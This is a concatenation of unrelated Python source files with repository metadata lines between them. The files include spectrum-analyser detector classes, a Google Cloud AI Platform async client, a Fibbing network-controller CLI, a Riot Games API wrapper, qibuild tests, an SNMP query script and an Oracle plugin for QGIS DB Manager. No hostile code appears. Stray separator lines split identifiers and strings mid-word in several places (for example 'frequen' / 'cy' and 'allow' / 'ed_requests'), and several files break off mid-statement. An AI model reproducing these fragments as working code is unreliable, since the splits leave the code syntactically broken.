class Signal_Hound_fixed_frequency(Soft_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
frequency=None,
Navg=1,
delay=0.1,
prepare_for_each_point=False,
prepare_function=None,
prepare_function_kwargs: dict = {}
):
super().__init__()
self.frequency = frequency
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
if frequency is not None:
self.SH.frequency(frequency)
self.Navg = Navg
self.prepare_for_each_point = prepare_for_each_point
self.prepare_function = prepare_function
self.prepare_function_kwargs = prepare_function_kwargs
def acquire_data_point(self, **kw):
if self.prepare_for_each_point:
self.prepare()
time.sleep(self.delay)
if version.parse(qc.__version__) < version.parse('0.1.11'):
return self.SH.get_power_at_freq(Navg=self.Navg)
else:
self.SH.avg(self.Navg)
return self.SH.power()
def prepare(self, **kw):
if qc.__version__ < '0.1.11':
self.SH.prepare_for_measurement()
if self.prepare_function is not None:
self.prepare_function(**self.prepare_function_kwargs)
def finish(self, **kw):
self.SH.abort()
class Signal_Hound_sweeped_frequency(Hard_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
Navg=1,
delay=0.1,
**kw
):
super().__init__()
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
self.Navg = Navg
def acquire_data_point(self, **kw):
frequency = self.swp.pop()
self.SH.set('frequen
|
cy', frequency)
self.SH.prepare_for_measurement()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def get_values(self):
return ([self.a
|
cquire_data_point()])
def prepare(self, sweep_points):
self.swp = list(sweep_points)
# self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
class SH_mixer_skewness_det(Soft_Detector):
'''
Based on the "Signal_Hound_fixed_frequency" detector.
generates an AWG seq to measure sideband transmission
Inputs:
frequency (Hz)
QI_amp_ratio (parameter)
IQ_phase (parameter)
SH (instrument)
f_mod (Hz)
'''
def __init__(
self,
frequency,
QI_amp_ratio,
IQ_phase,
SH: SignalHound_USB_SA124B,
I_ch, Q_ch,
station,
Navg=1,
delay=0.1,
f_mod=10e6,
verbose=False,
**kw):
super(SH_mixer_skewness_det, self).__init__()
self.SH = SH
self.frequency = frequency
self.name = 'SignalHound_mixer_skewness_det'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH.frequency.set(frequency) # Accepts input in Hz
self.Navg = Navg
self.QI_amp_ratio = QI_amp_ratio
self.IQ_phase = IQ_phase
self.pulsar = station.pulsar
self.f_mod = f_mod
self.I_ch = I_ch
self.Q_ch = Q_ch
self.verbose = verbose
def acquire_data_point(self, **kw):
QI_ratio = self.QI_amp_ratio.get()
skewness = self.IQ_phase.get()
if self.verbose:
print('QI ratio: %.3f' % QI_ratio)
print('skewness: %.3f' % skewness)
self.generate_awg_seq(QI_ratio, skewness, self.f_mod)
self.pulsar.AWG.start()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def generate_awg_seq(self, QI_ratio, skewness, f_mod):
SSB_modulation_el = element.Element('SSB_modulation_el',
pulsar=self.pulsar)
cos_pulse = pulse.CosPulse(channel=self.I_ch, name='cos_pulse')
sin_pulse = pulse.CosPulse(channel=self.Q_ch, name='sin_pulse')
SSB_modulation_el.add(pulse.cp(cos_pulse, name='cos_pulse',
frequency=f_mod, amplitude=0.15,
length=1e-6, phase=0))
SSB_modulation_el.add(pulse.cp(sin_pulse, name='sin_pulse',
frequency=f_mod, amplitude=0.15 *
QI_ratio,
length=1e-6, phase=90 + skewness))
seq = sequence.Sequence('Sideband_modulation_seq')
seq.append(name='SSB_modulation_el', wfname='SSB_modulation_el',
trigger_wait=False)
self.pulsar.program_awgs(seq, SSB_modulation_el)
def prepare(self, **kw):
self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
|
hiqdev/reppy
|
heppy/Error.py
|
Python
|
bsd-3-clause
| 580
| 0.010345
|
import logging
class Error(Exception):
def __init__(self, message, data = {}):
|
self.message = message
self.data = data
def __str__(self):
return self.message + ": " + repr(self.data)
@staticmethod
def die(code, error, message = None):
if isinstance(error, Exception):
e = error
error = '{0}.{1}'.format(type(e).__module__, type(e).__name__)
message = str(e)
print 'Error: ' + error
if message:
print mes
|
sage
#logging.exception(message)
exit(code)
|
googleapis/python-aiplatform
|
google/cloud/aiplatform_v1/services/specialist_pool_service/async_client.py
|
Python
|
apache-2.0
| 34,518
| 0.001477
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1.services.specialist_pool_service import pagers
from google.cloud.aiplatform_v1.types import operation as gca_operation
from google.cloud.aiplatform_v1.types import specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool as gca_specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool_service
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import SpecialistPoolServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import SpecialistPoolServiceGrpcAsyncIOTransport
from .client import SpecialistPoolServiceClient
class SpecialistPoolServiceAsyncClient:
"""A service for creating and managing Customer SpecialistPools.
When customers start Data Labeling jobs, they can reuse/create
Specialist Pools to bring their own Specialists to label the
data. Customers can add/remove Managers for the Specialist Pool
on Cloud console, then Managers will get email notifications to
manage Specialists and tasks on CrowdCompute console.
"""
_client: SpecialistPoolServiceClient
DEFAULT_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_MTLS_ENDPOINT
specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.specialist_pool_path
)
parse_specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.parse_specialist_pool_path
)
common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(SpecialistPoolServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
SpecialistPoolServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
SpecialistPoolServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
SpecialistPoolServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(SpecialistPoolServiceClient.common_project_path)
parse_common_project_path = staticmethod(
SpecialistPoolServiceClient.parse_common_project_path
)
common_location_path = staticmethod(
SpecialistPoolServiceClient.common_location_path
)
parse_common_location_path = staticmethod(
SpecialistPoolServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_info.__func__(SpecialistPoolServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Add
|
itional arguments to pa
|
ss to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_file.__func__(SpecialistPoolServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return SpecialistPoolServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> SpecialistPoolServiceTransport:
"""Returns the transport used by the client instance.
Returns:
SpecialistPoolServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(SpecialistPoolServiceClient).get_transport_class,
type(SpecialistPoolServiceClient),
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, SpecialistPoolServiceTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the specialist pool service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
|
lferran/FibbingNode
|
fibbingnode/southbound/main.py
|
Python
|
gpl-2.0
| 7,223
| 0
|
from ConfigParser import DEFAULTSECT
from cmd import Cmd
import logging
import sys
import subprocess
import argparse
import datetime
from fibbing import FibbingManager
import fibbingnode
from fibbingnode.misc.utils import dump_threads
import signal
log = fibbingnode.log
CFG = fibbingnode.CFG
class FibbingCLI(Cmd):
Cmd.prompt = '> '
def __init__(self, mngr, *args, **kwargs):
self.fibbing = mngr
Cmd.__init__(self, *args, **kwargs)
def do_add_node(self, line=''):
"""Add a new fibbing node"""
self.fibbing.add_node()
def do_show_lsdb(self, line=''):
log.info(self.fibbing.root.lsdb)
def do_draw_network(self, line):
"""Draw the network as pdf in the given file"""
self.fibbing.root.lsdb.graph.draw(line)
def do_print_graph(self, line=''):
log.info('Current network graph: %s',
self.fibbing.root.lsdb.graph.edges(data=True))
def do_print_net(self, line=''):
"""Print information about the fibbing network"""
self.fibbing.print_net()
def do_print_routes(self, line=''):
"""Print information about the fibbing routes"""
self.fibbing.print_routes()
def do_exit(self, line=''):
"""Exit the prompt"""
return True
def do_cfg(self, line=''):
part = line.split(' ')
val = part.pop()
key = part.pop()
sect = part.pop() if part else DEFAULTSECT
CFG.set(sect, key, val)
def do_call(self, line):
"""Execute a command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call(*items[1:])
except KeyError:
log.error('Unknown node %s', items[0])
def do_add_route(self, line=''):
"""Setup a fibbing route
add_route network via1 metric1 via2 metric2 ..."""
items = line.split(' ')
if len(items) < 3:
log.error('route only takes at least 3 arguments: '
'network via_address metric')
else:
points = []
i = 2
while i < len(items):
points.append((items[i-1], items[i]))
i += 2
log.critical('Add route request at %s',
datetime.datetime.now().strftime('%H.%M.%S.%f'))
self.fibbing.install_route(items[0], points, True)
def do_rm_route(self, line):
"""Remove a route or parts of a route"""
items = line.split(' ')
if len(items) == 1:
ans = raw_input('Remove the WHOLE fibbing route for %s ? (y/N)'
% line)
if ans == 'y':
self.fibbing.remove_route(line)
else:
self.fibbing.remove_route_part(items[0], *items[1:])
def default(self, line):
"""Pass the command to the shell"""
args = line.split(' ')
if args[0] in self.fibbing.nodes:
self.do_call(' '.join(args))
else:
try:
log.info(subprocess.check_output(line, shell=True))
except Exception as e:
log.info('Command %s failed', line)
log.info(e.message)
def eval(self, line):
"""Interpret the given line ..."""
self.eval(line)
def do_ospfd(self, line):
"""Connect to the ospfd daemon of the given node"""
try:
self.fibbing[line].call('telnet', 'localhost', '2604')
except KeyError:
log.error('Unknown node %s', line)
def do_vtysh(self, line):
"""Execute a vtysh command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=False)
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_configure(self, line):
"""Execute a vtysh configure command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=True)
result = result.strip(' \n\t')
if result:
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_traceroute(self, line, max_ttl=10):
"""
Perform a simple traceroute between the source and an IP
:param max_ttl: the maximal ttl to use
"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call('traceroute', '-q', '1', '-I',
'-m', str(max_ttl), '-w', '.1', items[1])
except KeyError:
log.error('Unknown node %s', items[0])
except ValueError:
log.error('This command takes 2 arguments: '
'source node and destination IP')
def do_dump(self, line=''):
dump_threads()
def handle_args():
parser = argparse.ArgumentParser(description='Starts a fibbing node.')
parser.add_argument('ports', metavar='IF', type=str, nargs='*',
help='A physical interface to use')
parser.add_argument('--debug', action='store_true', default=False,
help='Debug (default: disabled)')
parser.add_argument('--nocli', action='store_true', default=False,
help='Disable the CLI')
parser.add_argument('--cfg', help='Use specified config file',
default=None)
args = parser.parse_args()
instance_count = CFG.getint(DEFAULTSECT, 'controller_instance_number')
# Update default config
if args.cfg:
CFG.read(args.cfg)
fibbingnode.BIN = CFG.get(DEFAULTSECT, 'quagga_path')
# Check if we need to force debug mode
if args.debug:
CFG.set(DEFAULTSECT, 'debug', '1')
if CFG.getboolean(DEFAULTSECT, 'debug'):
|
log.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
# Check for any specified physical port to use both in config file
# or in args
ports = set(p for p in CFG.sections()
|
if not (p == 'fake' or p == 'physical' or p == DEFAULTSECT))
ports.update(args.ports)
if not ports:
log.warning('The fibbing node will not be connected '
'to any physical ports!')
else:
log.info('Using the physical ports: %s', ports)
return ports, instance_count, not args.nocli
def main(_CLI=FibbingCLI):
phys_ports, name, cli = handle_args()
if not cli:
fibbingnode.log_to_file('%s.log' % name)
mngr = FibbingManager(name)
def sig_handler(sig, frame):
mngr.cleanup()
fibbingnode.EXIT.set()
sys.exit()
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
try:
mngr.start(phys_ports=phys_ports)
if cli:
cli = _CLI(mngr=mngr)
cli.cmdloop()
fibbingnode.EXIT.set()
except Exception as e:
log.exception(e)
fibbingnode.EXIT.set()
finally:
fibbingnode.EXIT.wait()
mngr.cleanup()
if __name__ == '__main__':
main()
|
gnozell/Yar-Ha-Har
|
lib/riotwatcher/riotwatcher.py
|
Python
|
mit
| 22,700
| 0.00163
|
from collections import deque
import time
import requests
# Constants
BRAZIL = 'br'
EUROPE_NORDIC_EAST = 'eune'
EUROPE_WEST = 'euw'
KOREA = 'kr'
LATIN_AMERICA_NORTH = 'lan'
LATIN_AMERICA_SOUTH = 'las'
NORTH_AMERICA = 'na'
OCEANIA = 'oce'
RUSSIA = 'ru'
TURKEY = 'tr'
# Platforms
platforms = {
BRAZIL: 'BR1',
EUROPE_NORDIC_EAST: 'EUN1',
EUROPE_WEST: 'EUW1',
KOREA: 'KR',
LATIN_AMERICA_NORTH: 'LA1',
LATIN_AMERICA_SOUTH: 'LA2',
NORTH_AMERICA: 'NA1',
OCEANIA: 'OC1',
RUSSIA: 'RU',
TURKEY: 'TR1'
}
queue_types = [
'CUSTOM', # Custom games
'NORMAL_5x5_BLIND', # Normal 5v5 blind pick
'BOT_5x5', # Historical Summoners Rift coop vs AI games
'BOT_5x5_INTRO', # Summoners Rift Intro bots
'BOT_5x5_BEGINNER', # Summoner's Rift Coop vs AI Beginner Bot games
'BOT_5x5_INTERMEDIATE', # Historical Summoner's Rift Coop vs AI Intermediate Bot games
'NORMAL_3x3', # Normal 3v3 games
'NORMAL_5x5_DRAFT', # Normal 5v5 Draft Pick games
'ODIN_5x5_BLIND', # Dominion 5v5 Blind Pick games
'ODIN_5x5_DRAFT', # Dominion 5v5 Draft Pick games
'BOT_ODIN_5x5', # Dominion Coop vs AI games
'RANKED_SOLO_5x5', # Ranked Solo 5v5 games
'RANKED_PREMADE_3x3', # Ranked Premade 3v3 games
'RANKED_PREMADE_5x5', # Ranked Premade 5v5 games
'RANKED_TEAM_3x3', # Ranked Team 3v3 games
'RANKED_TEAM_5x5', # Ranked Team 5v5 games
'BOT_TT_3x3', # Twisted Treeline Coop vs AI games
'GROUP_FINDER_5x5', # Team Builder games
'ARAM_5x5', # ARAM games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1v1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2v2 games
'SR_6x6', # Hexakill games
'URF_5x5', # Ultra Rapid Fire games
'BOT_URF_5x5', # Ultra Rapid Fire games played against AI games
'NIGHTMARE_BOT_5x5_RANK1', # Doom Bots Rank 1 games
'NIGHTMARE_BOT_5x5_RANK2', # Doom Bots Rank 2 games
'NIGHTMARE_BOT_5x5_RANK5', # Doom Bots Rank 5 games
'ASCENSION_5x5', # Ascension games
'HEXAKILL', # 6v6 games on twisted treeline
'KING_PORO_5x5', # King Poro game games
'COUNTER_PICK', # Nemesis games,
'BILGEWATER_5x5', # Black Market Brawlers games
]
game_maps = [
{'map_id': 1, 'name': "Summoner's Rift", 'notes': "Summer Variant"},
{'map_id': 2, 'name': "Summoner's Rift", 'notes': "Autumn Variant"},
{'map_id': 3, 'name': "The Proving Grounds", 'notes': "Tutorial Map"},
{'map_id': 4, 'name': "Twisted Treeline", 'notes': "Original Version"},
{'map_id': 8, 'name': "The Crystal Scar", 'notes': "Dominion Map"},
{'map_id': 10, 'name': "Twisted Treeline", 'notes': "Current Version"},
{'map_id': 11, 'name': "Summoner's Rift", 'notes': "Current Version"},
{'map_id': 12, 'name': "Howling Abyss", 'notes': "ARAM Map"},
{'map_id': 14, 'name': "Butcher's Bridge", 'notes': "ARAM Map"},
]
game_modes = [
'CLASSIC', # Classic Summoner's Rift and Twisted Treeline games
'ODIN', # Dominion/Crystal Scar games
'ARAM', # ARAM games
'TUTORIAL', # Tutorial games
'ONEFORALL', # One for All games
'ASCENSION', # Ascension games
'FIRSTBLOOD', # Snowdown Showdown games
'KINGPORO', # King Poro games
]
game_types = [
'CUSTOM_GAME', # Custom games
'TUTORIAL_GAME', # Tutorial games
'MATCHED_GAME', # All other games
]
sub_types = [
'NONE', # Custom games
'NORMAL', # Summoner's Rift unranked games
'NORMAL_3x3', # Twisted Treeline unranked games
'ODIN_UNRANKED', # Dominion/Crystal Scar games
'ARAM_UNRANKED_5v5', # ARAM / Howling Abyss games
'BOT', # Summoner's Rift and Crystal Scar games played against AI
'BOT_3x3', # Twisted Treeline games played against AI
'RANKED_SOLO_5x5', # Summoner's Rift ranked solo queue games
'RANKED_TEAM_3x3', # Twisted Treeline ranked team games
'RANKED_TEAM_5x5', # Summoner's Rift ranked team games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1x1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2x2 games
'SR_6x6', # Hexakill games
'CAP_5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URF_BOT', # Ultra Rapid Fire games against AI
'NIGHTMARE_BOT', # Nightmare bots
'ASCENSION', # Ascension games
'HEXAKILL', # Twisted Treeline 6x6 Hexakill
'KING_PORO', # King Poro games
'COUNTER_PICK', # Nemesis games
'BILGEWATER', # Black Market Brawlers games
]
player_stat_summary_types = [
'Unranked', # Summoner's Rift unranked games
'Unranked3x3', # Twisted Treeline unranked games
'OdinUnranked', # Dominion/Crystal Scar games
'AramUnranked5x5', # ARAM / Howling Abyss games
'CoopVsAI', # Summoner's Rift and Crystal Scar games played against AI
'CoopVsAI3x3', # Twisted Treeline games played against AI
'RankedSolo5x5', # Summoner's Rift ranked solo queue games
'RankedTeams3x3', # Twisted Treeline ranked team games
'RankedTeams5x5', # Summoner's Rift ranked team games
'OneForAll5x5', # One for All games
'FirstBlood1x1', # Snowdown Showdown 1x1 games
'FirstBlood2x2', # Snowdown Showdown 2x2 games
'SummonersRift6x6', # Hexakill games
'CAP5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URFBots', # Ultra Rapid Fire games played against AI
'NightmareBot', # Summoner's Rift games played against Nightmare AI
'Hexakill', # Twisted Treeline 6x6 Hexakill games
'KingPoro', # King Poro games
'CounterPick', # Nemesis games
'Bilgewater', # Black Market Brawlers games
]
solo_queue, ranked_5s, ranked_3s = 'RANKED_SOLO_5x5', 'RANKED_TEAM_5x5', 'RANKED_TEAM_3x3'
api_versions = {
'champion': 1.2,
'current-game': 1.0,
'featured-games': 1.0,
'game': 1.3,
'league': 2.5,
'lol-static-data': 1.2,
'lol-status': 1.0,
'match': 2.2,
'matchhistory': 2.2,
'matchlist': 2.2,
'stats': 1.3,
'summoner': 1.4,
'team': 2.4
}
class LoLException(Exception):
def __init__(self, error, response):
self.error = error
self.response = response
def __str__(self):
return self.error
error_400 = "Bad request"
error_401 = "Unauthorized"
error_404 = "Game data not found"
error_429 = "Too many requests"
error_500 = "Internal server error"
error_503 = "Service unavailable"
def raise_status(response):
if response.status_code == 400:
raise LoLException(error_400, response)
elif response.status_code == 401:
raise LoLException(error_401, response)
elif response.status_code == 404:
raise LoLException(error_404, response)
elif response.status_code == 429:
raise LoLException(error_429, response)
elif response.status_code == 500:
raise LoLException(error_500, response)
elif response.status_code == 503:
raise LoLException(error_503, response)
else:
response.raise_for_status()
class RateLimit:
def __init__(self, allowed_requests, seconds):
self.allowed_requests = allow
|
ed_requests
self.seconds = seconds
self.made_requests = deque()
def __reload(self):
t = time.time()
while len(self.made_requests) > 0 and self.made_requests[0] < t:
self.made_request
|
s.popleft()
def add_request(self):
self.made_requests.append(time.time() + self.seconds)
def request_available(self):
self.__reload()
return len(self.made_requests) < self.allowed_requests
class RiotWatcher:
def __init__(self, key, default_region=NORTH_AMERICA, limits=(RateLimit(10, 10), RateLimit(500, 600), )):
self.key = key
self.default_region = default_region
self.limits = limits
def can_make_request(self):
for lim in self.limits:
if not lim.request_available():
return False
return True
def base_request(self, url, region, static=False, **kwargs):
if region is None:
region = self.default_region
args = {'api_key': self.key}
for k in kwargs:
if kwargs[k] is not None:
|
aldebaran/qibuild
|
python/qibuild/test/test_qibuild_find.py
|
Python
|
bsd-3-clause
| 3,244
| 0.000308
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Test QiBuild Find """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import qibuild.config
from qibuild import find
from qibuild.test.conftest import QiBuildAction
from qitoolchain.test.conftest import QiToolchainAction
def test_find_target_in_project_cmake(qibuild_action, record_messages):
""" Test Find Target In Project CMake """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
record_messages.reset()
qibuild_action("find", "--cmake", "hello", "world")
assert record_messages.find("WORLD_LIBRARIES")
def test_find_target_in_toolchain_package_cmake(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package CMake """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
build_worktree = qibuild_action.build_worktree
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
build_worktree.worktree.remove_project("world", from_disk=True)
record_messages.reset()
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("find", "--cmake", "world", "-c", "foo")
assert record_messages.find("WORLD_LIBRARIES")
def test_f
|
ind_target_in_build_dir(qibuild_action, record_messages):
""" Test Find Target In Build Dir """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
qibuild_action("make", "hello")
record_messages.reset()
qibuild_action("find", "hello", "world")
assert record_messages.find(find.libr
|
ary_name("world"))
rc = qibuild_action("find", "hello", "libworld", retcode=True)
assert rc == 1
def test_find_target_in_toolchain_package(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("make", "-c", "foo")
record_messages.reset()
qibuild_action("find", "world", "-c", "foo")
assert record_messages.find(find.library_name("world"))
record_messages.reset()
qibuild_action("find", "hello", "-c", "foo")
assert record_messages.find(find.binary_name("hello"))
rc = qibuild_action("find", "libeggs", "-c", "foo", retcode=True)
assert rc == 1
|
brutalic/pynet_brutal
|
class2/GetSysNameDesc.py
|
Python
|
apache-2.0
| 1,227
| 0.007335
|
#!/usr/bin/python
import getpass
import snmp_helper
from snmp_helper import snmp_get_oid,snmp_extract
import yaml
DeviceIp1 = '184.105.247.70'
DeviceIp2 = '184.105.247.71'
SnmpPort = 161
sysNameOID = '.1.3.6.1.2.1.1.5.0'
sysDescOID = '.1.3.6.1.2.1.1.1.0'
#Connecting to the devices, using methods from getpass library
DeviceIp1 = raw_input("pynet-rtr1 IP address: ")
DeviceIp2 = raw_input("pynet-rtr2 IP address: ")
SnmpString = getpass.getpass(prompt="Community string: ")
#Creating a tuple for each device, consisting of the IP, SNMP string and SNMP port
SnmpDevice1 = (DeviceIp1, SnmpString, SnmpPort)
SnmpDevice2 = (DeviceIp2, SnmpString, SnmpPort)
#Creating a loop to cycle through each device's information, using the snmp_helper lybrary methods
for SnmpDevices in (SnmpDevice1, SnmpDevice2):
for OIDs in (sysNameOID, sysDescOID):
SnmpInformation = snmp_get_oid(SnmpDevices, oid=OIDs)
SnmpDescOutput = snmp_extract(SnmpInformation)
#Printing results to a yaml file
SmpFileOutput = 'SnmpInformation.txt'
with open(SmpFileOutput, "a") as f:
f.write(yaml.safe_dump(SnmpDescOutput, default_flow_style=False))
print
|
"\nResults printed to a yam
|
l file.\n"
|
SebDieBln/QGIS
|
python/plugins/db_manager/db_plugins/oracle/plugin.py
|
Python
|
gpl-2.0
| 22,853
| 0.000131
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS (Oracle)
Date : Aug 27, 2014
copyright : (C) 2014 by Médéric RIBREUX
email : [email protected]
The content of this file is based on
- PG_Manager by Martin Dobias <[email protected]> (GPLv2 license)
- DB Manager by Giuseppe Sucameli <[email protected]> (GPLv2 license)
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# this will disable the dbplugin if the connector raise an ImportError
from .connector import OracleDBConnector
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, \
Database, Schema, Table, VectorTable, TableField, TableConstraint, \
TableIndex, TableTrigger, TableRule
try:
from . import resources_rc
except ImportError:
pass
from ..html_elems import HtmlParagraph, HtmlList, HtmlTable
from qgis.core import QgsCredentials
def classFactory():
return OracleDBPlugin
class OracleDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QIcon(":/db_manager/oracle/icon")
@classmethod
def typeName(self):
return 'oracle'
@classmethod
def typeNameString(self):
return 'Oracle Spatial'
@classmethod
def providerName(self):
return 'oracle'
@classmethod
def connectionSettingsKey(self):
return '/Oracle/connections'
def connectToUri(self, uri):
self.db = self.databasesFactory(self, uri)
if self.db:
return True
return False
def databasesFactory(self, connection, uri):
return ORDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QSettings()
settings.beginGroup(u"/{0}/{1}".format(
self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(
self.tr('There is no defined database connection "{}".'.format(
conn_name)))
from qgis.core import QgsDataSourceURI
uri = QgsDataSourceURI()
settingsList = ["host", "port", "database", "username", "password"]
host, port, database, username, password = map(
lambda x: settings.value(x, "", type=str), settingsList)
# qgis1.5 use 'savePassword' instead of 'save' setting
savedPassword = settings.value("save", False, type=bool) or \
settings.value("savePassword", False, type=bool)
# get all of the connexion options
useEstimatedMetadata = settings.value(
"estimatedMetadata", False, type=bool)
uri.setParam('userTablesOnly', unicode(
settings.value("userTablesOnly", False, type=bool)))
uri.setParam('geometryColumnsOnly', unicode(
settings.value("geometryColumnsOnly", False, type=bool)))
uri.setParam('allowGeometrylessTables', unicode(
